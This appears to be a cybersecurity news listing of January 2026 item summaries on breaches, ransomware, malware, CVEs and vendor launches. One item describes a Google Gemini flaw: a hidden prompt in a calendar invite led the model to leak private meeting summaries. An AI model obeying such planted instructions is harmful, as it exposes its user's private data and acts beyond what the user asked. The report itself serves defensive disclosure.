Global apparel giant Nike has launched an investigation into a potential data breach after being listed as a victim by the 'WorldLeaks' data extortion group. The group, which emerged in 2025 and focuses on data theft without deploying ransomware, threatened to publish stolen Nike data on January 24. Nike has confirmed it is assessing the situation. The type and volume of the allegedly stolen data have not been disclosed by the attackers.

Jan 25, 20264 min read

Sandworm Deploys New 'DynoWiper' Malware in Failed Attack on Polish Power Grid

The Russian state-sponsored hacking group Sandworm has been attributed with a major, albeit unsuccessful, cyberattack against Poland's power system in late December 2025. Poland's energy minister described it as the 'largest cyber attack' on their energy infrastructure in years. Cybersecurity firm ESET linked the attack to Sandworm and discovered the use of a previously undocumented destructive malware, which has been named 'DynoWiper'. This incident underscores Sandworm's continued focus on targeting critical infrastructure with new cyber weapons.

Jan 25, 20266 min read

Phishing Campaign Hits Russia with Amnesia RAT, Uses GitHub and Dropbox for Payload Delivery

A sophisticated, multi-stage phishing campaign is targeting users in Russia, delivering a combination of the Amnesia remote access trojan (RAT) and ransomware. The attack, analyzed by Fortinet FortiGuard Labs, is notable for its use of public cloud services like GitHub and Dropbox to host payloads and its use of a tool called 'defendnot' to disable Microsoft Defender antivirus. The campaign relies on social engineering and abuse of native Windows features rather than software exploits to achieve system compromise.

Jan 25, 20265 min read

Everest Ransomware Group Leaks 343GB of Under Armour Customer Data

The Russia-linked Everest ransomware group has leaked 343 GB of data allegedly stolen from global sportswear brand Under Armour. The massive data dump, which occurred on January 24, 2026, followed a failed extortion attempt. The leaked data is reported to contain the personally identifiable information (PII) of millions of customers, highlighting the 'double extortion' tactic where data publication is the primary threat. Under Armour has not yet commented on the incident.

Jan 25, 20265 min read

Trend Micro Details New RCE Flaw in MetaGPT (CVE-2026-0761)

Trend Micro has published details and a detection rule for a new high-severity remote code execution (RCE) vulnerability in Foundation Agents MetaGPT, tracked as CVE-2026-0761. The exploit, which occurs over HTTP, can be leveraged by an attacker for initial access into a network or for lateral movement. Trend Micro has released DDI RULE 5627 to detect exploitation attempts and advises organizations to update security products and scan for signs of compromise.

Jan 25, 20264 min read

Microsoft Issues Emergency Out-of-Band Patches for Flawed January Updates

Microsoft has released several emergency out-of-band (OOB) updates on January 24, 2026, to address significant bugs introduced by its January 13 Patch Tuesday release. The faulty updates caused a range of issues, including Remote Desktop connection failures, application hangs when accessing cloud storage like OneDrive, and system restart failures. The new cumulative updates, including KB5078136 and KB5078238, are available for various Windows versions and are intended to restore stability and functionality for affected users.

Jan 24, 20264 min read

Pwn2Own Automotive: Hackers Earn $1M+ Exposing 76 Zero-Days in Tesla and Other Vehicle Systems

At the Pwn2Own Automotive 2026 event, security researchers earned over $1 million by successfully demonstrating 76 unique zero-day exploits against a range of modern vehicle systems. A major focus was Tesla, where researchers chained multiple vulnerabilities to gain root access to an infotainment system, accounting for $516,500 of the total prize money. The competition also targeted EV chargers and other in-vehicle infotainment (IVI) systems, highlighting the expanding and critical attack surface of the connected automotive industry. Vendors have been given a 90-day disclosure deadline to patch the flaws.

Jan 24, 20265 min read

LastPass Users Targeted in Phishing Campaign to Steal Master Passwords

Password manager service LastPass is warning its users of an active phishing campaign aimed at stealing their master passwords. Attackers are sending fraudulent emails that impersonate official LastPass maintenance alerts, creating a false sense of urgency to trick users into 'backing up' their password vaults. The links in these emails lead to a convincing but malicious clone of the LastPass login page designed to capture user credentials. LastPass has confirmed it is working to take down the attacker infrastructure and advises users to be vigilant.

Jan 24, 20265 min read

DragonForce Ransomware Claims Attack on U.S. Bank, Threatens Data Leak

The DragonForce ransomware group has claimed responsibility for a cyberattack against Uinta Bank, a community bank based in Wyoming, USA. In a post on their data leak site on January 23, 2026, the threat actors announced the breach and threatened to publish a "full dump" of the bank's data if negotiations are not initiated. This double extortion tactic, which involves both data encryption and data exfiltration, puts significant pressure on the victim organization. The incident underscores the ongoing threat ransomware poses to the financial services sector, regardless of the institution's size.

Jan 24, 20266 min read

CISA Mandates Patching for Four Actively Exploited Flaws in Zimbra, Vite, and More

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added four vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog, confirming they are under active attack. The flaws affect a diverse range of products, including Synacor Zimbra Collaboration Suite (CVE-2025-68645), the Vite frontend framework (CVE-2025-31125), Versa Concerto SD-WAN (CVE-2025-34026), and the 'eslint-config-prettier' NPM package (CVE-2025-54313). Due to evidence of ongoing exploitation, Federal Civilian Executive Branch (FCEB) agencies are required to apply patches or mitigations by February 12, 2026. CISA strongly urges all organizations to prioritize remediation to defend against these immediate threats.

Jan 23, 20265 min read

North Korean Hackers Lure Developers with Fake Job Interviews, Backdoor macOS via VS Code

State-sponsored threat actors from North Korea, including the Lazarus Group, are targeting software developers in a sophisticated campaign dubbed 'Contagious Interview.' According to Jamf Threat Labs, the attackers use fake job offers to entice developers, particularly in the crypto and fintech sectors, into cloning malicious repositories from GitHub and GitLab. The attack abuses a feature in Microsoft's Visual Studio Code (VS Code), where trusting a repository can automatically execute a hidden `tasks.json` file. This triggers a backdoor on macOS systems, establishing persistence, collecting system data, and opening a C2 channel for remote code execution.

Jan 23, 20266 min read

PcComponentes Denies Data Breach, Blames Credential Stuffing for Account Takeovers

Spanish electronics retailer PcComponentes has denied claims of a massive data breach affecting 16 million customers, stating its internal systems were not compromised. The announcement came after a threat actor, 'daghetiaw,' attempted to sell a large customer database on a hacking forum. The company's investigation concluded the incident was a large-scale credential stuffing attack, where attackers used credentials stolen from other breaches to access user accounts. While denying the breach, PcComponentes confirmed that customer data such as names, addresses, and phone numbers were exposed for accounts with reused passwords. In response, the company has mandated two-factor authentication (2FA) for all users and invalidated all active sessions.

Jan 23, 20265 min read

INC Ransomware OPSEC Fail: Reused Infrastructure Leads to Data Recovery for 12 U.S. Victims

A significant operational security (OPSEC) failure by the INC ransomware group has allowed cybersecurity firm Cyber Centaurs to recover stolen data for twelve U.S. organizations. The discovery was made after analyzing an attack involving the RainINC ransomware variant. Researchers found artifacts from the open-source backup tool, Restic, including hardcoded S3 access keys and passwords. By pivoting to this attacker-controlled infrastructure, Cyber Centaurs found that the gang had been reusing the same cloud storage repositories across multiple attacks, leaving the encrypted data of a dozen unrelated victims accessible. This rare win for defenders highlights how even sophisticated groups can make critical mistakes.

Jan 23, 20265 min read

Anubis RaaS Ups the Ante with Destructive 'Wipe Mode' to Maximize Extortion

A new Ransomware-as-a-Service (RaaS) operation named Anubis is gaining attention for its destructive capabilities. Evolving from a prototype called 'Sphinx,' Anubis offers its affiliates a dual-execution model. In addition to standard encryption, the malware can be run with a `/WIPEMODE` parameter that irreversibly overwrites and destroys victim files, rendering them unrecoverable. This tactic fundamentally changes the extortion negotiation, as paying a ransom cannot restore the data. It indicates a strategy where attackers rely solely on the threat of leaking exfiltrated data for payment, using permanent data destruction as additional leverage. The group is targeting organizations opportunistically across the globe.

Jan 23, 20266 min read

China-Linked APT 'UAT-8837' Targets North American Critical Infrastructure

A new report from Cisco Talos has identified a China-nexus Advanced Persistent Threat (APT) group, tracked as UAT-8837, actively targeting critical infrastructure organizations in North America since at least 2025. The group gains initial access by exploiting public-facing vulnerabilities, including a zero-day in SiteCore products (CVE-2025-53690), and using compromised credentials. Once inside, UAT-8837 employs a variety of open-source tools, such as the Earthworm utility for creating reverse tunnels, to conduct reconnaissance, exfiltrate data, and maintain persistence. Cisco Talos assesses with medium confidence that the group is linked to China, highlighting the ongoing threat of state-sponsored espionage against vital sectors.

Jan 23, 20266 min read

New Zealand's 'Manage My Health' Portal Breached; Data of 120,000 Patients Held for Ransom

New Zealand's largest patient portal, Manage My Health, is responding to a significant data breach that occurred in late December 2025. An attacker using the alias 'Kazu' claims to have stolen over 400,000 files, including sensitive medical records like lab results and clinical notes, affecting up to 126,000 individuals. The attacker has demanded a $60,000 ransom. The breach originated from a vulnerability in the 'Health Documents' module of the application. Manage My Health has since closed the security gap and is working with New Zealand authorities, while the government has launched an urgent review of the incident.

Jan 23, 20264 min read

Oracle's January 2026 Patch Update Fixes 337 Flaws, Including Critical Remote Exploits

Oracle has released its January 2026 Critical Patch Update (CPU), a massive security update containing 337 new patches for vulnerabilities across more than 30 product families. The update resolves approximately 230 unique CVEs, with the discrepancy due to shared components like third-party libraries affecting multiple products. Alarmingly, over 235 of the patched vulnerabilities can be exploited remotely without authentication, significantly increasing their risk. The update includes fixes for over two dozen critical-rated flaws, such as CVE-2025-66516, a 10.0 CVSS vulnerability in the Apache Tika library embedded in Oracle products. Oracle strongly urges customers to apply these patches without delay.

Jan 22, 20264 min read

Cisco Scrambles to Patch Actively Exploited RCE Zero-Day in Comms Products

Cisco has issued an urgent warning and emergency patches for a critical remote code execution (RCE) vulnerability, CVE-2026-20045, affecting a wide range of its Unified Communications and Webex Calling products. This zero-day flaw is being actively exploited in the wild, allowing unauthenticated attackers to send crafted HTTP requests to the web management interface and execute arbitrary code, potentially leading to full root access on the underlying server. In response to the active threat, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added the vulnerability to its Known Exploited Vulnerabilities (KEV) catalog, mandating federal agencies to patch by February 11, 2026. Cisco has confirmed there are no workarounds and is urging all customers to apply the updates immediately.

Jan 22, 20266 min read

Exposed Security Training Apps Like OWASP Juice Shop Create Backdoors into Corporate Clouds

A new report reveals a dangerous trend where intentionally vulnerable security training applications, such as OWASP Juice Shop and DVWA, are being deployed on live, production cloud infrastructure and left exposed to the internet. Threat actors are actively scanning for and exploiting these misconfigured applications to compromise the cloud environments of numerous organizations, including Fortune 500 companies and security vendors. The exploits have been used to achieve remote code execution, deploy webshells, install cryptominers, and steal sensitive cloud credentials, turning these training tools into unmonitored backdoors.

Jan 22, 20265 min read

'Skeleton Key' Attacks Bypass Defenses by Weaponizing Legitimate RMM Tools

A sophisticated attack campaign dubbed "Skeleton Key" is bypassing traditional, malware-focused security defenses by weaponizing legitimate remote monitoring and management (RMM) software. A report from KnowBe4 Threat Labs details how attackers first compromise user credentials and then abuse trusted IT tools to create persistent, stealthy backdoors inside enterprise networks. This 'living-off-the-land' (LotL) technique allows attackers to blend in with normal administrative activity, making their presence extremely difficult to detect and highlighting the need for security teams to shift focus from signature-based detection to behavioral analysis and identity security.

Jan 22, 20265 min read

Spotlight on Supply Chain Risk: Reports Warn of Escalating SaaS-to-SaaS Attacks

The digital supply chain has become a primary focus of cyber risk, as highlighted by multiple events on January 22, 2026. A new report from security firm Black Kite warns that the retail and wholesale sectors are highly exposed to attacks that exploit interconnected IT systems and shared vendors. Concurrently, SaaS security leader Obsidian Security launched the industry's first end-to-end SaaS supply chain security solution to combat the growing threat of SaaS-to-SaaS attacks, where a compromise in one application (like Salesloft) can cascade to affect hundreds of integrated partner applications (like Drift). These developments underscore the urgent need for organizations to gain visibility and control over their sprawling, interconnected digital ecosystems.

Jan 22, 20264 min read

osTicket Flaw Lets Attackers Read Server Files via Malicious PDF Export

A high-severity vulnerability, CVE-2026-22200, has been disclosed in osTicket, a popular open-source helpdesk system. The flaw allows an unauthenticated, anonymous attacker to read arbitrary files from the server by injecting a malicious PHP filter chain into a support ticket. When a privileged user exports the ticket to PDF, the vulnerability is triggered, embedding the contents of sensitive server files (like configuration files) into the generated PDF as a bitmap image. Researchers warn this flaw can be chained with other vulnerabilities for full remote code execution (RCE). Patches are available in versions 1.18.3 and 1.17.4.

Jan 22, 20264 min read

Critical Flaw in Popular Node.js Library 'binary-parser' Allows Code Execution

The CERT Coordination Center (CERT/CC) has issued a warning about a critical vulnerability, CVE-2026-1245, in the popular 'binary-parser' npm library for Node.js. The flaw, which has a CVSS score of 6.5, allows for arbitrary JavaScript execution. The vulnerability exists because the library dynamically generates parser code from user-supplied input without proper sanitization, creating a code injection sink. This poses a significant software supply chain risk, as any application using the library to parse untrusted data could be compromised. Developers are urged to update to the patched version 2.3.0 immediately.

Jan 22, 20264 min read

New Android Malware Uses AI to Mimic Human Behavior and Evade Detection

A new and sophisticated family of Android malware is leveraging artificial intelligence to commit ad fraud while evading detection. The malware uses TensorFlow, Google's open-source machine learning framework, to mimic human-like behavior, such as realistic clicks and swipes on hidden advertisements. This advanced technique allows it to bypass traditional ad fraud detection systems that rely on identifying the predictable, scripted patterns of bots. The malware can also stream video of its operations back to attackers, likely for model refinement, representing a significant evolution in mobile threat capabilities.

Jan 22, 20264 min read

Critical GNU Inetutils Flaw Allows Root Access via Telnet Authentication Bypass

A critical authentication bypass vulnerability, CVE-2026-24061, has been disclosed in the telnet daemon (telnetd) of GNU Inetutils, a common package of networking utilities for many Unix-like operating systems. The flaw allows a remote attacker to bypass authentication and gain root access to the system simply by providing a specially crafted username. Successful exploitation, achieved by passing '-f root' as the USER environment variable, leads to a complete compromise of the machine. All versions of GNU Inetutils up to and including 2.7 are affected. Administrators are urged to disable the telnetd service immediately.

Jan 22, 20264 min read

Everest Ransomware Claims 861GB Data Breach at McDonald's India

The Everest ransomware group has claimed a major cyberattack against McDonald's India, alleging the theft of 861 gigabytes of sensitive data. In a post on its dark web leak site on January 20, 2026, the group threatened to publicly release the information if a ransom is not paid. The compromised data reportedly includes a vast amount of personal information on customers and employees, as well as internal corporate documents. This incident, if confirmed, would be the latest in a series of data security issues for the fast-food giant's Indian operations, which suffered previous breaches. The Everest group, a Russian-speaking operation active since 2020, is known for its double-extortion tactics, and the potential leak of customer data poses a significant risk of identity theft and phishing campaigns.

Jan 22, 20265 min read

Oracle Issues Critical Patch for CVSS 10.0 Auth Bypass in WebLogic Server

Oracle has released its January 2026 Critical Patch Update (CPU), a massive security release containing 337 fixes for vulnerabilities across its product portfolio. The most severe flaw addressed is CVE-2026-21962, a critical authentication bypass vulnerability in the Oracle WebLogic Server Proxy Plug-in with a CVSS score of 10.0. This vulnerability can be exploited remotely by a low-privileged attacker without user interaction, potentially allowing complete takeover of the affected component. The flaw impacts WebLogic Server Proxy Plug-in versions 12.2.1.4.0, 14.1.1.0.0, and 14.1.2.0.0. Oracle strongly urges customers to apply these cumulative patches immediately, highlighting the continued risk of exploitation of previously patched vulnerabilities due to slow enterprise adoption rates.

Jan 21, 20265 min read

EU Moves to Ban High-Risk Tech Suppliers from 18 Critical Sectors

On January 20, 2026, the European Commission introduced a revised EU Cybersecurity Act (CSA 2) aimed at bolstering the bloc's supply chain security. The proposal establishes a framework to identify and exclude high-risk technology suppliers from 18 critical sectors, including energy and telecommunications. This move is widely interpreted as a measure to reduce dependency on Chinese technology providers. The act mandates the derisking of mobile networks by requiring operators to replace equipment from designated high-risk vendors within three years. It also aims to streamline the European Cybersecurity Certification Framework (ECCF) to make compliance faster and more accessible, particularly for SMEs, and strengthens the mandate of the EU's cybersecurity agency, ENISA.

Jan 21, 20265 min read

RansomHub Hits Apple Supplier Luxshare, Claims Theft of R&D Data for Apple, Nvidia, and Tesla

The RansomHub ransomware group has claimed a significant data breach against Luxshare Precision Industry, a major Chinese electronics manufacturer and a critical partner for Apple, Nvidia, Tesla, and other tech giants. In a dark web post on January 21, 2026, the group alleged it had stolen and encrypted sensitive intellectual property, including 3D CAD models and engineering designs for products related to its high-profile clients. RansomHub threatened to leak the data, accusing Luxshare's IT department of attempting to hide the incident. Luxshare is a primary assembler for Apple's iPhone and Vision Pro. Independent analysis of sample data released by the attackers appears to confirm it contains confidential project details, validating the severity of this major supply chain breach.

Jan 21, 20266 min read

Drones Emerge as Urgent Cyber Threat to Critical Infrastructure

A report published on January 21, 2026, by the University of Canberra and Cisco warns of the urgent and escalating cyber threat posed by drones to critical infrastructure. The study highlights that as drone technology becomes more advanced, accessible, and affordable, its potential for use in cyber warfare is growing significantly. Researchers found that drones can be used as platforms to launch sophisticated cyberattacks against targets like data centers and telecommunications networks, exploiting gaps in physical and cybersecurity defenses. The report stresses a significant disconnect between the current level of threat awareness among infrastructure operators and the real-world capabilities of modern drones, urging industries to integrate drone-related risks into their security and resilience programs.

Jan 21, 20265 min read

NYDFS Enforces Stricter Cybersecurity Rules for Financial Firms

The New York Department of Financial Services (NYDFS) has now fully implemented the final amendments to its landmark Part 500 Cybersecurity Regulation. These changes impose significantly more prescriptive and stringent requirements on regulated financial and insurance entities. As of May 2025, firms are mandated to have automated vulnerability scanning, enhanced access controls, and robust logging and monitoring capabilities, including endpoint detection and response (EDR). The amendments also place a strong emphasis on proactive governance of third-party service providers, including cloud and AI vendors. With the rules now fully in effect in 2026, the NYDFS is expected to have lower tolerance for non-compliance and will likely intensify its cybersecurity examinations.

Jan 21, 20266 min read

Ingram Micro Breach Exposes Data of 42,000 After Safepay Ransomware Attack

Global IT distributor Ingram Micro has officially notified 42,521 individuals that their personal and sensitive information, including Social Security numbers, was stolen during a ransomware attack in July 2025. The incident, attributed to the Safepay ransomware group, compromised employment and job applicant records. After Ingram Micro reportedly refused to pay the ransom, the threat actors published the stolen 3.5 terabytes of data on their dark web leak site.

Jan 20, 20265 min read

CEOs Optimistic, CISOs Wary: Survey Reveals Deep Divide on AI's Cybersecurity Impact

A new survey by specialty insurer AXIS Capital, released on January 20, 2026, reveals a significant perception gap between CEOs and CISOs regarding the role of artificial intelligence in cybersecurity. While CEOs are largely optimistic about AI's productivity and security benefits, CISOs are more acutely aware of the new risks it introduces, including data leakage, model manipulation, and sophisticated AI-driven attacks. This disconnect could lead to misaligned security strategies and underinvestment in critical risk areas.

Jan 20, 20264 min read

North Korean 'Konni' APT Weaponizes Google Ads to Deliver EndRAT Malware

The North Korean state-sponsored threat group Konni is conducting a sophisticated spear-phishing campaign dubbed "Operation Poseidon." The advanced persistent threat (APT) actor is weaponizing Google advertising URLs to make malicious links appear legitimate, thereby bypassing security filters and tricking users. The campaign's ultimate goal is to deliver the 'EndRAT' malware, a remote access trojan, onto victim systems.

Jan 20, 20265 min read

Stealthy 'PDFSIDER' Backdoor Uses DLL Side-Loading to Bypass EDR and AV

Security researchers at Resecurity have uncovered a new stealthy backdoor, dubbed 'PDFSIDER,' that uses a DLL side-loading technique to evade EDR and antivirus solutions. The malware masquerades as a legitimate PDF application to load a malicious DLL, establishing an encrypted command-and-control channel for long-term, covert access. The backdoor is already being actively used by ransomware groups, including the notorious Qilin gang, for payload delivery.

Jan 20, 20266 min read

South Korean Giant Kyowon Group Hit by Ransomware, 9.6 Million Accounts at Risk

The South Korean conglomerate Kyowon Group has confirmed it suffered a significant ransomware attack that disrupted operations and resulted in data exfiltration. The attack, detected on January 10, 2026, compromised approximately 600 of the company's 800 servers. South Korean authorities estimate that up to 9.6 million user accounts (representing 5.5 million unique individuals) may have been affected, as attackers reportedly exploited an open external port to gain initial access.

Jan 20, 20265 min read

Fake Ad Blocker Crashes Chrome, Tricks Users into Installing 'ModeloRAT' Malware

A novel malware campaign dubbed "CrashFix" is using a malicious Google Chrome extension that impersonates the 'uBlock Origin Lite' ad blocker to intentionally crash victims' browsers. The attack, attributed to a group called 'KongTuke,' then uses social engineering, presenting a fake crash report that tricks users into running a PowerShell command to "fix" the issue. This command ultimately downloads and installs 'ModeloRAT,' a previously undocumented Python-based remote access trojan.

Jan 20, 20266 min read

GTMaritime Launches 'GT Identify' to Tackle Maritime Cybersecurity and Compliance

Maritime technology firm GTMaritime has launched GT Identify, a new cybersecurity system designed to help ship operators comply with increasingly stringent regulations. Announced on January 20, 2026, the system provides fleet-wide hardware and software asset inventory, vulnerability reporting, and aligns with the NIST Cybersecurity Framework. The launch addresses the growing need for robust cyber risk management to meet IMO and IACS E26/E27 requirements.

Jan 20, 20263 min read

Threat Landscape Converges as Attackers Target ICS and AI Systems

New research from Cyble highlights a dangerous convergence of threats, as both hacktivists and financially motivated cybercriminals are increasingly targeting Industrial Control Systems (ICS), Operational Technology (OT), and enterprise AI systems. The report, published January 20, 2026, notes that attackers are exploiting exposed HMI and SCADA systems while also leveraging AI to create polymorphic malware and more effective social engineering lures.

Jan 20, 20265 min read

'DragonForce' Emerges as New Ransomware Cartel Built on LockBit and Conti DNA

A new Ransomware-as-a-Service (RaaS) operation named DragonForce has emerged, positioning itself as a "ransomware cartel." The group is reportedly building its operations on the leaked source code of the notorious LockBit 3.0 and Conti ransomware variants. Operating a RaaS platform called 'Ransombay,' DragonForce's strategy includes absorbing smaller rival operations, signaling a trend towards consolidation in the cybercrime ecosystem.

Jan 20, 20265 min read

Weaponized Invites: Google Gemini Flaw Allows Calendar Data Theft via Prompt Injection

Security researchers from Miggo Security have uncovered a significant vulnerability in Google Gemini's integration with Google Calendar. The flaw allowed attackers to use an indirect prompt injection technique to exfiltrate summaries of private meetings. By sending a specially crafted calendar invitation containing a hidden malicious prompt, an attacker could trick the AI into executing unauthorized actions when the user made a legitimate query about their calendar. This attack bypassed Google's privacy controls without requiring the user to interact directly with the malicious payload, highlighting emerging security risks in applications integrated with large language models (LLMs).

Jan 19, 20265 min read

Evelyn Stealer: New Malware Hits Developers Through Malicious VS Code Extensions

A new information-stealing malware, named Evelyn Stealer, is being distributed through malicious extensions on the Microsoft Visual Studio Code (VS Code) Marketplace. Researchers at Trend Micro and Koi Security report the campaign specifically targets software developers to steal credentials, cryptocurrency wallet data, and other sensitive information. Three malicious extensions—`BigBlack.bitcoin-black`, `BigBlack.codo-ai`, and `BigBlack.mrbigblacktheme`—have been identified as the distribution vectors. This supply chain attack highlights the significant risk posed by unvetted third-party tools in development environments, as compromising a single developer can provide a gateway into an entire organization's critical infrastructure.

Jan 19, 20265 min read

Patch Now: Critical Flaw Exposes Thousands of TP-Link VIGI Cameras to Remote Hacking

TP-Link has issued urgent firmware updates for a critical vulnerability in its VIGI line of security cameras. The flaw could allow an unauthenticated remote attacker to gain unauthorized access to the devices, potentially viewing, modifying, or deleting surveillance footage. At the time of disclosure, researchers discovered over 2,500 VIGI cameras were exposed to the public internet and vulnerable to this attack. Owners are strongly advised to update their camera firmware immediately and ensure their devices are not directly accessible from the internet to mitigate the significant risk of compromise.

Jan 19, 20265 min read

16.6 Million Records Exposed: Raaga and Pass'Sport Breaches Added to Have I Been Pwned

The Have I Been Pwned (HIBP) data breach notification service has been updated with over 16.6 million user records from two separate incidents. The first breach involves 10.2 million users of the Indian music streaming service Raaga, which occurred in December 2025 and exposed names, email addresses, and MD5-hashed passwords. The second breach affects 6.4 million users of the French government's Pass'Sport program, also from December 2025, exposing names, dates of birth, and email addresses. Users of these services are urged to check HIBP and change their passwords, especially for the Raaga breach, due to the high risk of credential stuffing attacks from the weakly hashed passwords.

Jan 19, 20265 min read

ScarCruft APT: North Korean Hackers Evolve Tactics in 'Artemis' Campaign

The North Korean advanced persistent threat (APT) group ScarCruft, also known as APT37 or Reaper, has launched a new campaign dubbed 'Artemis'. Active since late 2025, the campaign targets entities likely in South Korea using malicious Hanword Word Processor (HWP) documents. Researchers report that ScarCruft has evolved its tactics, now employing steganography to hide malicious code within image files and leveraging legitimate cloud services, specifically Yandex Cloud, for its command and control (C2) infrastructure. This shift makes the group's activities harder to detect, as their C2 traffic blends in with legitimate cloud service activity.

Jan 19, 20266 min read

Manhunt: Black Basta Ransomware Leader Added to EU's Most Wanted List After Raids

An international law enforcement operation has targeted the prolific Black Basta ransomware group, which is linked to over 600 attacks and millions in ransom payments. Police in Ukraine conducted raids against two suspected members of the syndicate. Concurrently, an international arrest warrant and an INTERPOL Red Notice have been issued for a Russian national believed to be the group's founder and leader. The individual has been placed on the EU's Most Wanted list, signaling a high-priority, coordinated effort to dismantle one of the world's most active ransomware operations.

Jan 19, 20266 min read

Public Exploits Released for Critical SQLi and RCE Flaws in Business Software

Multiple critical and high-severity vulnerabilities have been disclosed in various business software products, with proof-of-concept (PoC) exploits made public, elevating the risk of immediate attack. A critical SQL injection flaw (CVE-2026-1179) affects Yonyou KSOA 9.0. A critical command injection vulnerability (CVE-2026-1192) was found in Tosei Online Store Management System 1.01. Additionally, a high-severity improper authorization bug (CVE-2026-1193) impacts MineAdmin. Since vendors reportedly did not respond before disclosure, users of these products are urged to apply immediate mitigations to prevent compromise.

Jan 19, 20266 min read

Access Broker Pleads Guilty After Selling Access to 50 Companies to Undercover FBI Agent

A Jordanian national has pleaded guilty in a U.S. court for his role as an Initial Access Broker (IAB) in the cybercrime ecosystem. The man admitted to compromising and selling unauthorized access to the corporate networks of approximately 50 different enterprise organizations. The operation was uncovered when he unknowingly sold this access to an undercover U.S. federal agent. The case highlights the critical role IABs play in the cybercrime supply chain, providing the initial foothold for major threat actors like ransomware groups, and demonstrates the effectiveness of law enforcement sting operations in disrupting these criminal enterprises.

Jan 19, 20266 min read

Warning: Malicious Chrome Extensions Hijack Workday, NetSuite Sessions to Bypass MFA

Security researchers have uncovered five malicious Google Chrome extensions that impersonate legitimate add-ons for popular enterprise SaaS applications like Workday and NetSuite. The extensions are designed to perform session hijacking by stealing active session cookies and tokens after a user logs in. This technique allows attackers to completely bypass security controls, including multi-factor authentication (MFA), and gain full, authenticated access to the user's account. The stolen sessions can be used to exfiltrate sensitive corporate data, such as financial records and employee PII, highlighting the significant threat posed by unvetted browser extensions in corporate environments.

Jan 19, 20266 min read

Healthcare Data Breaches Double, Fueled by 'Shadow AI' and Vendor Risk

The healthcare industry is facing a cybersecurity crisis, with a new report indicating that the number of data breaches doubled in the past year. The surge is being driven by two key factors: the unmanaged use of generative AI tools by staff, termed 'shadow AI,' and persistent, unmitigated risks from third-party vendors. This dangerous trend is exemplified by the McLaren data breach, where a ransomware attack compromised the sensitive health information of over 743,000 patients. The report highlights a lack of confidence within the sector to handle these evolving threats, urging organizations to gain visibility into AI usage and implement far more stringent vendor risk management programs.

Jan 19, 20267 min read

Ransomware Attacks Skyrocket 58% in 2025, Setting New Records

Multiple cybersecurity reports released in January 2026 confirm that 2025 was the most active year for ransomware on record. A report from GuidePoint Security's GRIT team documented a staggering 58% year-over-year increase in publicly claimed ransomware victims. December 2025 alone saw 814 attacks, the highest monthly total ever recorded. Despite law enforcement takedowns of major players like LockBit, the ransomware ecosystem proved resilient. Affiliates quickly migrated to other operations, with the Qilin and Akira ransomware groups emerging as the dominant forces, collectively responsible for a significant portion of all attacks. The United States remained the primary target, and the manufacturing sector was the most heavily impacted industry.

Jan 19, 20267 min read

2025 in Review: Simple Errors, Not 0-Days, Caused Biggest Breaches

A year-end analysis of 2025's major data breaches reveals a recurring theme: fundamental security failures, not sophisticated zero-day exploits, were the primary cause. The report, published on December 26, 2025, highlights cloud security misconfigurations and third-party supply chain attacks as the dominant root causes. High-profile incidents at McDonald's (default password '123456'), TalentHook (public Azure Blob storage), Harrods, and TransUnion (both breached via third-party vendors) serve as stark examples of how neglecting basic security hygiene leads to massive data exposure.

Jan 18, 20264 min read

RedVDS Takedown: Microsoft and Law Enforcement Disrupt $40M Cybercrime-as-a-Service Operation

In a major international operation, Microsoft's Digital Crimes Unit, alongside law enforcement from the U.S., U.K., and Germany, has disrupted the RedVDS cybercrime-as-a-service (CaaS) platform. The service, operated by a group tracked as Storm-2470, provided criminals with cheap, disposable RDP servers used to launch large-scale phishing, BEC, and fraud campaigns. The operation, which took down key domains like redvds[.]com, has been linked to over $40 million in fraud losses in the U.S. and impacted more than 191,000 organizations globally.

Jan 17, 20265 min read

NSA Kickstarts Zero Trust Adoption with New Foundational Implementation Guides

The U.S. National Security Agency (NSA) has released the first two documents in its new Zero Trust Implementation Guidelines (ZIGs) series. The 'Primer' and 'Discovery Phase' guides are designed to provide federal agencies and other organizations with a foundational roadmap for adopting a Zero Trust security architecture. This initiative aligns with the Department of War's mandate for agencies to achieve specific Zero Trust targets and emphasizes the critical first step of gaining comprehensive visibility across all data, applications, assets, and services (DAAS).

Jan 17, 20264 min read

Infoblox to Acquire Axur, Expanding into AI-Powered External Threat Disruption

Infoblox, a leader in DNS security and network services, has announced a definitive agreement to acquire Axur, a company specializing in AI-driven external threat detection and takedown. The acquisition will extend Infoblox's preemptive security offerings, enabling customers to combat threats like phishing, brand abuse, and credential theft that originate outside the corporate network. By integrating Axur's rapid takedown capabilities with its own DNS-level controls, Infoblox aims to significantly reduce the uptime of active cyberattacks.

Jan 17, 20263 min read

ColorTokens Xshield Platform Gains FedRAMP Moderate Authorization, Boosting Federal Zero Trust Adoption

ColorTokens has achieved FedRAMP Moderate Authorization for its Xshield microsegmentation platform, a significant milestone that makes the solution readily available to U.S. federal agencies via the FedRAMP Marketplace. This authorization validates Xshield's security posture and enables government bodies to adopt the platform to accelerate their Zero Trust initiatives, particularly in preventing the lateral movement of cyberattacks across complex on-premise, cloud, and OT environments.

Jan 17, 20263 min read

Asimily Boosts Cisco ISE Integration with Enhanced Microsegmentation for IoT/OT Devices

Asimily, a provider of cyber asset and exposure management, has launched enhanced microsegmentation capabilities, including new support for Security Group Access Control Lists (SGACL) in Cisco Identity Services Engine (ISE). This integration allows organizations to translate rich device context—such as risk, behavior, and classification—from the Asimily platform into dynamically enforced security policies in Cisco ISE. The goal is to automate the containment of threats across complex IT, IoT, and OT environments.

Jan 17, 20263 min read

SpyCloud Unveils Supply Chain Threat Protection to Combat Third-Party Identity Risks

SpyCloud has launched its Supply Chain Threat Protection solution, a new platform designed to give organizations visibility into identity-related compromises within their vendor and supplier ecosystems. By leveraging a massive repository of recaptured data from breaches and malware infections, the solution provides actionable intelligence on compromised credentials and infected devices affecting third parties. This allows security teams to move beyond static questionnaires and proactively address active threats within their supply chain.

Jan 17, 20263 min read

Noction IRP v4.3 Launches with Automated DDoS Detection and Routing-Native Mitigation

Noction has released version 4.3 of its Intelligent Routing Platform (IRP), introducing a major new feature called Automatic Anomaly Detection (AAD). This capability uses behavior-based traffic analysis to rapidly identify DDoS attacks and other network anomalies. Once an attack is detected, the platform can automatically trigger mitigation actions using routing-native mechanisms like BGP FlowSpec or Remote Triggered Blackholing (RTBH), enabling network operators to respond to threats in seconds without relying on external systems.

Jan 17, 20263 min read

JumpCloud Unveils AI-Powered Tools to Govern Shadow AI and Manage Autonomous Agents

